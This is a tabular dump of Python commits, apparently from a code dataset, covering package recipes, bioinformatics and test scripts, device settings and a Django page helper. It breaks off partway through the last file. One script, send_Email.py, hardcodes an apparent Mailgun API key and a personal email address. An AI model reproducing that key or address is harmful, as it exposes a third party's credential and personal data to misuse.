commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
f363864f7f6ad9da45cb3053816d500838821a27 | add new package (#27093) | var/spack/repos/builtin/packages/r-posterior/package.py | var/spack/repos/builtin/packages/r-posterior/package.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RPosterior(RPackage):
"""Tools for Working with Posterior Distributions.
Provides useful tools for both users and developers of packages for
fitting Bayesian models or working with output from Bayesian models. The
primary goals of the package are to: (a) Efficiently convert between many
different useful formats of draws (samples) from posterior or prior
distributions. (b) Provide consistent methods for operations commonly
performed on draws, for example, subsetting, binding, or mutating draws.
(c) Provide various summaries of draws in convenient formats. (d) Provide
lightweight implementations of state of the art posterior inference
diagnostics. References: Vehtari et al. (2021) <doi:10.1214/20-BA1221>."""
homepage = "https://mc-stan.org/posterior/"
cran = "posterior"
version('1.1.0', sha256='eff6262dbcc1bf18337f535b0c75ba2fe360322e8b170c466e24ed3ee76cf4d2')
depends_on('r@3.2.0:', type=('build', 'run'))
depends_on('r-abind', type=('build', 'run'))
depends_on('r-checkmate', type=('build', 'run'))
depends_on('r-rlang@0.4.7:', type=('build', 'run'))
depends_on('r-tibble@3.0.0:', type=('build', 'run'))
depends_on('r-vctrs', type=('build', 'run'))
depends_on('r-tensora', type=('build', 'run'))
depends_on('r-pillar', type=('build', 'run'))
depends_on('r-distributional', type=('build', 'run'))
depends_on('r-matrixstats', type=('build', 'run'))
| Python | 0 | |
64f6aee62637336f8c4f9fbf4170e4415300ffc4 | Create differential_expression_genes.py | Differential_expression/differential_expression_genes.py | Differential_expression/differential_expression_genes.py | #!/usr/bin/env python
# dealing with command line input
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-t",type=int, default=0)
parser.add_argument("-above_threshold", nargs="+", type=str)
parser.add_argument("-absent", nargs="+", type=str)
parser.add_argument("-other", nargs="+", type=str)
parser.add_argument("-t_absent", type=int, default=0)
parser.add_argument("-expression", type=str)
args = parser.parse_args()
threshold = args.t
above_threshold = args.above_threshold
absent = args.absent
other = args.other
absent_threshold = args.t_absent
expression = args.expression
# making lists of genes with expression above threshold in above_threshold samples
initial_genes = []
initial_annotation_IDs = []
initial_loci = []
delimiter = '\t'
for sample in above_threshold:
gene_list = []
locus_list = []
annotation_ID_list = []
file = open(expression)
file.readline()
for line in file:
split = line.split(delimiter)
gene = split[0]
annotation_ID = split[2]
locus = split[3]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample1_expression = float(sample1_expression)
sample2_expression = split[8]
sample2_expression = float(sample2_expression)
if (sample1 == sample and sample1_expression > threshold) or (sample2 == sample and sample2_expression > threshold):
if gene not in gene_list:
gene_list.append(gene)
locus_list.append(locus)
annotation_ID_list.append(annotation_ID)
file.close()
initial_genes.append(gene_list)
initial_annotation_IDs.append(annotation_ID_list)
initial_loci.append(locus_list)
# making lists of genes with no expression in absent samples
for sample in absent:
gene_list = []
file = open(expression)
file.readline()
for line in file:
split = line.rstrip().split(delimiter)
gene = split[0]
annotation_ID = split[2]
locus = split[3]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample1_expression = float(sample1_expression)
sample2_expression = split[8]
sample2_expression = float(sample2_expression)
if (sample1 == sample and sample1_expression <= absent_threshold) or (sample2 == sample and sample2_expression <= absent_threshold):
if gene not in gene_list:
gene_list.append(gene)
locus_list.append(locus)
annotation_ID_list.append(annotation_ID)
file.close()
initial_genes.append(gene_list)
# extracting genes in all lists
final_genes = []
final_loci = []
final_annotation_IDs = []
sample_number = len(initial_genes)
initial_gene_list = initial_genes[0]
initial_loci_list = initial_loci[0]
initial_annotation_IDs_list = initial_annotation_IDs[0]
for gene in initial_gene_list:
count = 0
for list in initial_genes:
if gene in list:
count = count + 1
if count == sample_number:
final_genes.append(gene)
final_annotation_IDs.append(initial_annotation_IDs_list[initial_gene_list.index(gene)])
final_loci.append(initial_loci_list[initial_gene_list.index(gene)])
# writing file headers
output = open('gene_expression_profiles.txt', 'w')
output.write('Locus\tAnnotation gene ID\tCuffdiff gene ID\t')
for sample in above_threshold:
output.write(sample + '\t')
if other:
for sample in other:
output.write(sample + '\t')
for sample in absent:
output.write(sample + '\t')
output.write('\n')
# writing expression values
for final_gene in final_genes:
annotation_ID = final_annotation_IDs[final_genes.index(final_gene)]
locus = final_loci[final_genes.index(final_gene)]
output.write(locus + '\t' + annotation_ID + '\t' + final_gene + '\t')
for sample in above_threshold:
file = open(expression)
file.readline()
for line in file:
split = line.split(delimiter)
gene = split[0]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample2_expression = split[8]
if sample1 == sample and gene == final_gene:
output.write(sample1_expression + '\t')
break
elif sample2 == sample and gene == final_gene:
output.write(sample2_expression + '\t')
break
file.close()
if other:
for sample in other:
file = open(expression)
file.readline()
for line in file:
split = line.split(delimiter)
gene = split[0]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample2_expression = split[8]
if sample1 == sample and gene == final_gene:
output.write(sample1_expression + '\t')
break
elif sample2 == sample and gene == final_gene:
output.write(sample2_expression + '\t')
break
file.close()
for sample in absent:
file = open(expression)
file.readline()
for line in file:
split = line.split(delimiter)
gene = split[0]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample2_expression = split[8]
if sample1 == sample and gene == final_gene:
output.write(sample1_expression + '\t')
break
elif sample2 == sample and gene == final_gene:
output.write(sample2_expression + '\t')
break
output.write('\n')
output.close()
| Python | 0.998909 | |
1596d091183d89c703e67555e81f24722dc0d8a2 | add import script for Chelmsford | polling_stations/apps/data_collection/management/commands/import_chelmsford.py | polling_stations/apps/data_collection/management/commands/import_chelmsford.py | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = 'E07000070'
addresses_name = 'Democracy_Club__04May2017 (1).tsv'
stations_name = 'Democracy_Club__04May2017 (1).tsv'
elections = ['local.essex.2017-05-04']
csv_delimiter = '\t'
csv_encoding = 'latin-1'
| Python | 0 | |
94e83a48d3700cdc7c9bb6bd9a14860d2665c655 | Add custom roster module | _modules/roster.py | _modules/roster.py | # import python libraries
import logging
# import salt libraries
import salt.utils.files
import salt.utils.yaml
log = logging.getLogger(__name__)
def remove(roster, name):
'''
remove an entry from the salt-ssh roster
'''
with salt.utils.files.fopen(roster, 'r') as conf:
roster_txt = conf.read()
roster_yaml = salt.utils.yaml.safe_load(roster_txt)
try:
del roster_yaml[name]
except KeyError:
log.error('{0} does not exist in roster file {1}'.format(name, roster))
return False
try:
with salt.utils.files.fopen(roster, 'w+') as conf:
salt.utils.yaml.safe_dump(roster_yaml, conf, default_flow_style=False)
except (IOError, OSError):
log.error('Unable to delete {0} from roster file {1}'.format(name, roster))
return False
| Python | 0 | |
8a043a2d3a9517c5eb84aea3e9916419f6136e23 | Add tests for IndexAbstractor. | test/lib/indexabstractor.py | test/lib/indexabstractor.py | """ The PyUnit test framework for the indexabstractor. """
import unittest
from lib import parser
from lib.indexabstractor import *
class indexTestCase(unittest.TestCase):
def setUp(self):
self.sumo = parser.Ontology('data/Merge.kif', name='SUMO')
self.kif = parser.kifparse(self.sumo)
self.indexabstractor = IndexAbstractor()
def test0Normalize(self):
self.assertEqual(normalize('t.erm '), 'term')
self.assertEqual(normalize(' TeRM '), 'term')
self.assertNotEqual(normalize('t erm '), 'term')
def test1BuildIndex(self):
self.indexabstractor.update_index(self.kif)
self.assertEqual(self.indexabstractor.ontologies, {self.sumo})
self.assertEqual(self.indexabstractor.root, self.kif)
assert self.sumo in self.indexabstractor.index
def test2Search(self):
self.maxDiff = None
self.indexabstractor.update_index(self.kif)
self.assertEqual(self.indexabstractor.search('Plasma'),
self.indexabstractor.search('plasma'))
self.assertEqual(self.indexabstractor.search('ValidDeductiveArgument'),
self.indexabstractor.search(' valIddedUctiVeargument '))
self.assertNotEqual(self.indexabstractor.search('ValidDeductiveArgument'),
self.indexabstractor.search('InvalidDeductiveArgument'))
result = self.indexabstractor.search(' ContentbearingObJect')
assert self.sumo in result
definition = result[self.sumo]
self.assertEqual(sorted(definition),
sorted(['( relatedInternalConcept ContentBearingObject containsInformation )',
'( subclass ContentBearingObject CorpuscularObject )',
'( subclass ContentBearingObject ContentBearingPhysical )',
'( documentation ContentBearingObject EnglishLanguage "Any &%SelfConnectedObject that expressescontent. This content may be a &%Proposition, e.g. when the &%ContentBearingObjectis a &%Sentence or &%Text, or it may be a representation of an abstract orphysical object, as with an &%Icon, a &%Word or a &%Phrase." )']))
indexTestSuit = unittest.makeSuite(indexTestCase, 'test')
if __name__ == "__main__":
runner = unittest.TextTestRunner()
runner.run(indexTestSuit)
| Python | 0 | |
58de77d09564a43ae1934e2cee4543bc028c25c6 | Make android bot configuration more consistent. | build/android/pylib/device_settings.py | build/android/pylib/device_settings.py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from pylib import content_settings
def ConfigureContentSettingsDict(device, desired_settings):
"""Configures device content setings from a dictionary.
Many settings are documented at:
http://developer.android.com/reference/android/provider/Settings.Global.html
http://developer.android.com/reference/android/provider/Settings.Secure.html
http://developer.android.com/reference/android/provider/Settings.System.html
Many others are undocumented.
Args:
device: A DeviceUtils instance for the device to configure.
desired_settings: A dict of {table: {key: value}} for all
settings to configure.
"""
try:
sdk_version = int(device.old_interface.system_properties[
'ro.build.version.sdk'])
except ValueError:
logging.error('Skipping content settings configuration, unknown sdk %s',
device.old_interface.system_properties[
'ro.build.version.sdk'])
return
if sdk_version < 16:
logging.error('Skipping content settings configuration due to outdated sdk')
return
for table, key_value in sorted(desired_settings.iteritems()):
settings = content_settings.ContentSettings(table, device)
for key, value in key_value.iteritems():
settings[key] = value
logging.info('\n%s %s', table, (80 - len(table)) * '-')
for key, value in sorted(settings.iteritems()):
logging.info('\t%s: %s', key, value)
DETERMINISTIC_DEVICE_SETTINGS = {
'com.google.settings/partner': {
'network_location_opt_in': 0,
'use_location_for_services': 1,
},
'settings/global': {
'assisted_gps_enabled': 0,
# Disable "auto time" and "auto time zone" to avoid network-provided time
# to overwrite the device's datetime and timezone synchronized from host
# when running tests later. See b/6569849.
'auto_time': 0,
'auto_time_zone': 0,
'development_settings_enabled': 1,
# Flag for allowing ActivityManagerService to send ACTION_APP_ERROR intents
# on application crashes and ANRs. If this is disabled, the crash/ANR dialog
# will never display the "Report" button.
# Type: int ( 0 = disallow, 1 = allow )
'send_action_app_error': 0,
'stay_on_while_plugged_in': 3,
'verifier_verify_adb_installs' : 0,
},
'settings/secure': {
'allowed_geolocation_origins':
'http://www.google.co.uk http://www.google.com',
# Ensure that we never get random dialogs like "Unfortunately the process
# android.process.acore has stopped", which steal the focus, and make our
# automation fail (because the dialog steals the focus then mistakenly
# receives the injected user input events).
'anr_show_background': 0,
# Ensure Geolocation is enabled and allowed for tests.
'location_providers_allowed': 'gps,network',
'lockscreen.disabled': 1,
'screensaver_enabled': 0,
},
'settings/system': {
# Don't want devices to accidentally rotate the screen as that could
# affect performance measurements.
'accelerometer_rotation': 0,
'lockscreen.disabled': 1,
# Turn down brightness and disable auto-adjust so that devices run cooler.
'screen_brightness': 5,
'screen_brightness_mode': 0,
'user_rotation': 0,
},
}
NETWORK_DISABLED_SETTINGS = {
'settings/global': {
'airplane_mode_on': 1,
'wifi_on': 0,
},
}
| # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from pylib import content_settings
def ConfigureContentSettingsDict(device, desired_settings):
"""Configures device content setings from a dictionary.
Many settings are documented at:
http://developer.android.com/reference/android/provider/Settings.Global.html
http://developer.android.com/reference/android/provider/Settings.Secure.html
http://developer.android.com/reference/android/provider/Settings.System.html
Many others are undocumented.
Args:
device: A DeviceUtils instance for the device to configure.
desired_settings: A dict of {table: {key: value}} for all
settings to configure.
"""
try:
sdk_version = int(device.old_interface.system_properties[
'ro.build.version.sdk'])
except ValueError:
logging.error('Skipping content settings configuration, unknown sdk %s',
device.old_interface.system_properties[
'ro.build.version.sdk'])
return
if sdk_version < 16:
logging.error('Skipping content settings configuration due to outdated sdk')
return
for table, key_value in sorted(desired_settings.iteritems()):
settings = content_settings.ContentSettings(table, device)
for key, value in key_value.iteritems():
settings[key] = value
logging.info('\n%s %s', table, (80 - len(table)) * '-')
for key, value in sorted(settings.iteritems()):
logging.info('\t%s: %s', key, value)
DETERMINISTIC_DEVICE_SETTINGS = {
'com.google.settings/partner': {
'use_location_for_services': 1,
},
'settings/global': {
# Disable "auto time" and "auto time zone" to avoid network-provided time
# to overwrite the device's datetime and timezone synchronized from host
# when running tests later. See b/6569849.
'auto_time': 0,
'auto_time_zone': 0,
'stay_on_while_plugged_in': 3,
'verifier_verify_adb_installs' : 0,
},
'settings/secure': {
# Ensure that we never get random dialogs like "Unfortunately the process
# android.process.acore has stopped", which steal the focus, and make our
# automation fail (because the dialog steals the focus then mistakenly
# receives the injected user input events).
'anr_show_background': 0,
# Ensure Geolocation is enabled and allowed for tests.
'location_providers_allowed': 'gps,network',
'lockscreen.disabled': 1,
'screensaver_enabled': 0,
},
'settings/system': {
# Don't want devices to accidentally rotate the screen as that could
# affect performance measurements.
'accelerometer_rotation': 0,
'lockscreen.disabled': 1,
# Turn down brightness and disable auto-adjust so that devices run cooler.
'screen_brightness': 5,
'screen_brightness_mode': 0,
'user_rotation': 0,
},
}
NETWORK_DISABLED_SETTINGS = {
'settings/global': {
'airplane_mode_on': 1,
},
}
| Python | 0.000423 |
859d1031bc61cd4466953cbc7a5e282abff35e50 | Create database.py | database.py | database.py | Python | 0.000001 | ||
c8d57138240e87c802b84cf0b2b01efd01c80e41 | Create solution.py | hackerrank/algorithms/implementation/easy/angry_professor/py/solution.py | hackerrank/algorithms/implementation/easy/angry_professor/py/solution.py | #!/bin/python3
import sys
def isClassCancelled(arrivalTimes, cancellationThreshold):
count = 0
for arrivalTime in arrivalTimes:
if arrivalTime <= 0:
count += 1
return count < cancellationThreshold
t = int(input())
for a0 in range(t):
n, k = map(int, input().split())
a = tuple(map(int, input().split()))
if isClassCancelled(a, k):
print('YES')
else:
print('NO')
| Python | 0.000018 | |
02183bdcd1b3e4109568f5077a6074573bbd8bf9 | Add send_unsent.py. | send_unsent.py | send_unsent.py | #!/usr/bin/env python2
# -*- coding: utf8 -*-
import smtplib
import enseigner.model as model
import enseigner.emails as emails
mails = model.Mail.all_unsent()
yesno = raw_input(u'Envoyer %d mails ? ' % len(mails))
if yesno != 'yes':
exit(0)
sender = emails.Sender()
errors = []
for mail in mails:
try:
sender.send(mail.recipient, mail.subject, mail.content)
except smtplib.SMTPException as e:
errors.append((mail, e))
else:
mail.set_sent()
print(repr(errors))
with open('/tmp/enseigner_errors.txt', 'a') as fd:
for error in errors:
fd.write('\n\n')
fd.write(repr(error))
| Python | 0 | |
eee8b3e96f7b0c9f24e7c43483bb6d74bd8a490a | add proto | servy/proto.py | servy/proto.py | import json
class Response(object):
@classmethod
def encode(cls, content):
return json.dumps(content)
@classmethod
def decode(cls, content):
return json.loads(content)
class Request(object):
@classmethod
def encode(cls, proc, args, kw):
return json.dumps({
'proc': proc,
'args': args,
'kw': kw,
})
@classmethod
def decode(cls, content):
content = json.loads(content)
return (
content['proc'],
content['args'],
content['kw'],
)
| Python | 0.000006 | |
6f8d2e724f4aafb6b8295b8b0a1f915d5f21fa38 | fix script | tests/scripts/makereport.py | tests/scripts/makereport.py | # accepts 0,1, or 2 arguments. If a string starting with a number is handed in, it is assumed to be a subdirectory of the current directory to run on. If not specified, the newest build is used. Any other string is taken as the branch name for this test (or treated as mainline). Order of the arguments does not matter.
# for questions: Timo Heister
import xml.etree.ElementTree as ET
import glob
import sys
from datetime import datetime
import subprocess
class Group:
def __init__(self, name):
self.name = name
self.n_tests = 0
self.n_fail = 0
self.fail = []
self.fail_text = {}
class Revision:
def __init__(self):
self.groups = {}
self.number = -1
self.name = ''
self.n_tests = 0
self.n_fail = 0
branch=''
args=sys.argv
args.pop(0)
dirname=""
while len(args)>0:
if args[0].startswith("20"): #I hope this script is not used in the year 2100
dirname=args[0].replace('/','')
else:
branch=args[0].replace('/','')+'/'
args.pop(0)
if dirname=="":
n=glob.glob("*/Build.xml")
n.sort(reverse=True)
dirname = n[0].replace('/Build.xml','')
if len(glob.glob(dirname+'/Update.xml'))>0:
#new format
tree = ET.parse(dirname+'/Update.xml')
name = tree.getroot().find('BuildName').text
number = tree.getroot().find('Revision').text
date = datetime.strptime(dirname,"%Y%m%d-%H%M")
else:
#old format
tree = ET.parse(dirname+'/Notes.xml')
name = tree.getroot().attrib['BuildName']
number = name.split('-')[-1]
number = number[1:]
date = datetime.strptime(dirname,"%Y%m%d-%H%M")
header = "Revision: %s"%number + "\n"
header += "Date: %s"%(date.strftime("%Y %j %F %U-%w")) + '\n'
id = subprocess.check_output(["id","-un"])+'@'+subprocess.check_output(["hostname"])
id=id.replace('\n','')
header += "Id: %s"%id
#now Test.xml:
tree = ET.parse(dirname+'/Test.xml')
root = tree.getroot()
testing = root.find('Testing')
tests={}
for test in testing.findall("Test"):
status = test.attrib['Status']
fail=False
if status=="failed": fail=True
name = test.find('Name').text
group = name.split('/')[0]
if fail:
line = "%s 3 %s%s"%(date,branch,name)
else:
line = "%s + %s%s"%(date,branch,name)
if group not in tests: tests[group]=[]
tests[group].append( line )
for g in sorted(tests):
group = tests[g]
print header
for l in group:
print l
| # accepts 0,1, or 2 arguments. If a string starting with a number is handed in, it is assumed to be a subdirectory of the current directory to run on. If not specified, the newest build is used. Any other string is taken as the branch name for this test (or treated as mainline). Order of the arguments does not matter.
# for questions: Timo Heister
import xml.etree.ElementTree as ET
import glob
import sys
from datetime import datetime
import subprocess
class Group:
def __init__(self, name):
self.name = name
self.n_tests = 0
self.n_fail = 0
self.fail = []
self.fail_text = {}
class Revision:
def __init__(self):
self.groups = {}
self.number = -1
self.name = ''
self.n_tests = 0
self.n_fail = 0
branch=''
args=sys.argv
args.pop(0)
dirname=""
while len(args)>0:
if args[0].startswith("20"): #I hope this script is not used in the year 2100
dirname=args[0].replace('/','')
else:
branch=args[0].replace('/','')+'/'
args.pop(0)
if len(glob.glob(dirname+'/Update.xml'))>0:
#new format
tree = ET.parse(dirname+'/Update.xml')
name = tree.getroot().find('BuildName').text
number = tree.getroot().find('Revision').text
date = datetime.strptime(dirname,"%Y%m%d-%H%M")
else:
#old format
tree = ET.parse(dirname+'/Notes.xml')
name = tree.getroot().attrib['BuildName']
number = name.split('-')[-1]
number = number[1:]
date = datetime.strptime(dirname,"%Y%m%d-%H%M")
header = "Revision: %s"%number + "\n"
header += "Date: %s"%(date.strftime("%Y %j %F %U-%w")) + '\n'
id = subprocess.check_output(["id","-un"])+'@'+subprocess.check_output(["hostname"])
id=id.replace('\n','')
header += "Id: %s"%id
#now Test.xml:
tree = ET.parse(dirname+'/Test.xml')
root = tree.getroot()
testing = root.find('Testing')
tests={}
for test in testing.findall("Test"):
status = test.attrib['Status']
fail=False
if status=="failed": fail=True
name = test.find('Name').text
group = name.split('/')[0]
if fail:
line = "%s 3 %s%s"%(date,branch,name)
else:
line = "%s + %s%s"%(date,branch,name)
if group not in tests: tests[group]=[]
tests[group].append( line )
for g in sorted(tests):
group = tests[g]
print header
for l in group:
print l
| Python | 0.000003 |
339bb5cd325c7b9c08b8a43994f55bbe1756fbde | validate redirect | signup/auth.py | signup/auth.py | # Copyright (c) 2014, Fortylines LLC
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import urlparse
from django.conf import settings
from django.http.request import split_domain_port, validate_host
def validate_redirect_url(next_url):
"""
Returns the next_url path if next_url matches allowed hosts.
"""
if not next_url:
return None
parts = urlparse.urlparse(next_url)
if parts.netloc:
domain, port = split_domain_port(parts.netloc)
allowed_hosts = ['*'] if settings.DEBUG else settings.ALLOWED_HOSTS
if not (domain and validate_host(domain, allowed_hosts)):
return None
return parts.path
| Python | 0.000001 | |
c6e85e35a090c33bc1d6813dce959c8d47588ae8 | send an email with current IP address | send_Email.py | send_Email.py | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 16 12:14:51 2017
@author: smrak
"""
import requests
import urllib3
from datetime import datetime
def getIP():
"""
Sebastijan Mrak:
get & reteurn a public IP address
"""
http = urllib3.PoolManager()
r = http.request('GET', 'http://ip.42.pl/raw')
my_ip = r.data.decode('utf-8')
return my_ip
def send_simple_message(dev_name, ip):
dt = datetime.utcnow()
time = dt.strftime("%d-%m %H:%M")
return requests.post(
"https://api.mailgun.net/v3/sandbox1b5516af304e4d3bbb4ce505c254cbca.mailgun.org/messages",
auth=("api", "key-6e8d2a811ff2ea98114574c72dc988f6"),
data={"from": "Mailgun Sandbox <postmaster@sandbox1b5516af304e4d3bbb4ce505c254cbca.mailgun.org>",
"to": "Sebastijan <sebastijan.mrak@gmail.com>",
"subject": "Current IP address for device: " + dev_name,
"text": "IP address at a time "+str(time)+" is: "+str(ip)})
ip = getIP()
#print (ip)
send_simple_message('PC1', ip) | Python | 0 | |
c13968125383581e67804e11bc430391d355145a | Create DataStreamasDisjointIntervals.py | leetcode/352-Data-Stream-as-Disjoint-Intervals/DataStreamasDisjointIntervals.py | leetcode/352-Data-Stream-as-Disjoint-Intervals/DataStreamasDisjointIntervals.py | # Definition for an interval.
# class Interval(object):
# def __init__(self, s=0, e=0):
# self.start = s
# self.end = e
class SummaryRanges(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.intervals = []
def addNum(self, val):
"""
:type val: int
:rtype: void
"""
intv = self.intervals
l, r = 0, len(self.intervals) - 1
print val
while l <= r:
m = l + (r - l) / 2
if val < intv[m].start:
r = m - 1
elif val <= intv[m].end:
break
else:
l = m + 1
if l > r:
if 1 <= l < len(intv) and intv[l - 1].end + 1 == val and intv[l].start - 1 == val:
intv[l - 1].end = intv[l].end
intv.pop(l)
elif len(intv) > l and intv[l].start - 1 == val:
intv[l].start = val
elif l > 0 and intv[l - 1].end + 1 == val:
intv[l - 1].end = val
else:
intv.insert(l, Interval(val, val))
def getIntervals(self):
"""
:rtype: List[Interval]
"""
return self.intervals
# Your SummaryRanges object will be instantiated and called as such:
# obj = SummaryRanges()
# obj.addNum(val)
# param_2 = obj.getIntervals()
| Python | 0 | |
435220dda7eb928d9d959594d7986136f17da973 | Add actual url patter for #239 | popit/urls/rooturls.py | popit/urls/rooturls.py | from django.conf.urls import url
from popit.views import *
urlpatterns = [
url(r'^(?P<language>\w{2})', api_root, name="api-root"),
url(r'^$', api_root_all),
]
| Python | 0.000002 | |
f955620fb2cb12f14c38ad196d99ae12d5b9c1ff | add default openflow test settings | src/python/expedient/clearinghouse/defaultsettings/openflowtests.py | src/python/expedient/clearinghouse/defaultsettings/openflowtests.py | '''Contains default settings for the testing environment.
Created on Aug 22, 2010
@author: jnaous
'''
from os.path import join, dirname
PYTHON_DIR = join(dirname(__file__), "../../..")
OM_PROJECT_DIR = join(PYTHON_DIR, "openflow/optin_manager")
CH_PROJECT_DIR = join(PYTHON_DIR, "expedient/clearinghouse")
GCF_DIR = join(PYTHON_DIR, "gcf")
SSL_DIR = join(dirname(__file__), "ssl")
FLOWVISOR_DIR = join(PYTHON_DIR, "../../../../flowvisor")
'''Location of the testing Flowvisor source directory.'''
USE_RANDOM = False
'''Randomize the tests where possible?'''
SITE_IP_ADDR = '192.168.126.128'
'''The IP address of the host where Expedient and the OM are running.'''
OM_PORT = 8443
'''Port on which the Opt-In manager is running.'''
CH_PORT = 443
'''Port on which Expedient is running.'''
PREFIX = ""
FV_CONFIG = 'fv_vm_config.xml'
'''Name of the Flowvisor config file.'''
GCH_PORT = 8001
'''The port on which the GENI Clearinghouse should run.'''
FLOWVISORS = [
dict(
of_port=6633, # openflow port
xmlrpc_port=8080, # XMLRPC port for the flowvisor
username="root", # The username to use to connect to the FV
password='rootpassword', # The password to use to connect to the FV
path=(FLOWVISOR_DIR, FV_CONFIG), # configuration file
),
]
'''Information about where the test flowvisor should run.
This should be a list of dicts with the following keys:
* C{of_port}: The openflow port number the Flowvisor will use.
* C{xmlrpc_port}: The port number for XMLRPC calls to the Flowvisor.
* C{username}: The username to use for accessing the xmlrpc calls.
* C{password}: The password to use for accessing the xmlrpc calls.
* C{path}: The location of the flowvisor config file.
'''
MININET_VMS = [('172.16.77.131', 22)]
'''Information about where the Mininet VM is running.
This should be a list of tuples (IP address, SSH port number)
'''
MININET_SWITCH_TYPE = "user"
'''Type of switch to use. One of "user", "ovsk", "kernel"'''
NUM_EXPERIMENTS = 2
'''Number of Slices to instantiate during testing.'''
NUM_DUMMY_OMS = 3
'''Number of Dummy OMs to use for GAPI tests.'''
NUM_SWITCHES_PER_AGG = 10
'''Number of dummy switches for GAPI tests.'''
NUM_LINKS_PER_AGG = 20
'''Number of dummy links for GAPI tests.'''
NUM_DUMMY_FVS = 1
'''Don't change. Num of Dummy FVs for OM tests.'''
USE_HTTPS = True
'''Run using HTTPS or HTTP to expedient & OM?'''
SHOW_PROCESSES_IN_XTERM = True
'''Don't change. Should forked processes run in an xterm?'''
PAUSE_AFTER_TESTS = False
'''If true, each test will wait for an Enter from the user
before tearing down (useful to look at xterm output).
'''
TIMEOUT = 20
'''Time to wait for processes to run and for communication to work.'''
# basic settings sanity checks
assert(len(FLOWVISORS) == len(MININET_VMS))
| Python | 0 | |
f04f7555b06f5087100b336f3127b19e252b3794 | Fix issue 137 | pages/http.py | pages/http.py | """Page CMS functions related to the request object."""
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import WSGIRequest
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import loader, Context, RequestContext
from django.core.urlresolvers import reverse
from pages import settings
def get_request_mock():
"""Build a request mock that can be used for testing."""
bh = BaseHandler()
bh.load_middleware()
request = WSGIRequest({
'REQUEST_METHOD': 'GET',
'SERVER_NAME': 'test',
'SERVER_PORT': '8000',
'HTTP_HOST': 'testhost',
})
# Apply request middleware
for middleware_method in bh._request_middleware:
# LocaleMiddleware should never be applied a second time because
# it would broke the current real request language
if 'LocaleMiddleware' not in str(middleware_method.im_class):
response = middleware_method(request)
return request
class AutoRenderHttpError(Exception):
"""Cannot return context dictionary because a view returned an HTTP
response when a (template_name, context) tuple was expected."""
pass
def auto_render(func):
    """
    This view decorator automatically calls the ``render_to_response``
    shortcut. A view that use this decorator should return a tuple of this
    form : (template name, context) instead of a ``HttpRequest`` object.

    Wrapper-only keyword arguments (popped before the view is called):

    * ``template_name`` -- overrides the template chosen by the view.
    * ``only_context`` -- return the context dictionary instead of a
      rendered response; raises ``AutoRenderHttpError`` if the view
      returned an ``HttpResponse``.
    """
    # Local import keeps this decorator self-contained; wraps() preserves
    # the wrapped view's name/docstring for URL resolving and debugging.
    import functools

    @functools.wraps(func)
    def _dec(request, *args, **kwargs):
        template_override = kwargs.pop('template_name', None)
        only_context = kwargs.pop('only_context', False)
        # Call the view exactly once (the original duplicated this call
        # in each branch).
        response = func(request, *args, **kwargs)
        if only_context:
            # return only context dictionary
            if isinstance(response, HttpResponse):
                raise AutoRenderHttpError
            (template_name, context) = response
            return context
        if isinstance(response, HttpResponse):
            # The view rendered or redirected on its own; pass it through.
            return response
        (template_name, context) = response
        # Also expose the chosen template name inside the context.
        t = context['template_name'] = template_override or template_name
        return render_to_response(t, context,
            context_instance=RequestContext(request))
    return _dec
def get_slug_and_relative_path(path):
    """Return (slug, relative path, language) for the given URL path."""
    root = reverse('pages-root')
    if path.startswith(root):
        # Strip the CMS root prefix.
        path = path[len(root):]
    if path.endswith('/'):
        # Drop a single trailing slash.
        path = path[:-1]
    slug = path.rsplit("/", 1)[-1]
    lang = None
    if settings.PAGE_USE_LANGUAGE_PREFIX:
        # The first path component is the language code.
        lang = path.partition("/")[0]
        path = path[len(lang) + 1:]
    return slug, path, lang
def get_template_from_request(request, page=None):
    """
    Gets a valid template from different sources or falls back to the
    default template.
    """
    if settings.PAGE_TEMPLATES is None:
        return settings.DEFAULT_PAGE_TEMPLATE
    # Honour an explicit ?template=/POST override, but only when it names
